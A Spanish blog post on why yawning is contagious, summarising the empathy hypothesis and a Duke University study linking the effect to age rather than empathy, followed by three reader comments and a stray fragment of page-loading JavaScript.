Salud y belleza » Salud

Por qué se contagian los bostezos

3 Comentarios

Seguro que alguna vez te ha pasado eso de que vas en el metro o en el autobús por la mañana y la persona que se sienta frente a ti empieza a bostezar. A los pocos segundos no puedes evitar que tu boca también le secunde y empiece a abrirse. Los bostezos pueden llegar a extenderse por todo el vagón incluso. Todo el mundo sabe que los bostezos son contagiosos pero la ciencia no termina de explicar por qué.

contagiar-bostezo

Solo el ser humano y los chimpancés bostezan cuando oyen o ven a otro hacerlo. La teoría más extendida sobre por qué el bostezo se contagia es la de la empatía, la de nuestra capacidad para ponernos en el lugar del otro.

Pero cada vez hay más estudios que refutan esta teoría y apuestan por otras hipótesis, como un estudio realizado en la Universidad de Duke (Estados Unidos) donde se estudiaron a 328 voluntarios con unas pruebas cognitivas y un cuestionario sobre empatía. Después se expuso a los sujetos a vídeos donde salían otras personas bostezando y 222 de los 328 bostezaron, al menos, una vez.

Tras analizar los cuestionarios, los científicos no hallaron relación entre la empatía y los bostezos. Lo único que parecía tener relación era la edad. Los participantes más mayores eran menos proclives a imitar al resto y a bostezar.

contagio-bostezo

Aunque se haya detectado una pequeña relación entre el contagio de los bostezos y la edad y también con variantes genéticas, lo cierto es que los científicos todavía no han dado con la respuesta a la pregunta de por qué se contagian los bostezos pero seguro que a muchos leyendo este artículo y viendo las imágenes se les ha abierto la boca.

¿A ti también se te suelen contagiar los bostezos?

d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

3 Comments »

  • lupe said:

    yo siempre ando bostezando cuando cojo el bus por la mañana.

  • pablo said:

    no puedo creer que todavía no hayan descubierto por qué pasa esto, por qué se contagian los bostezos… tantos científicos y tan pocos resultados :)

  • macarena said:

    siempre que veo a alguien bostezando, incluso en la foto de antes, me dan ganas de bostezar.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.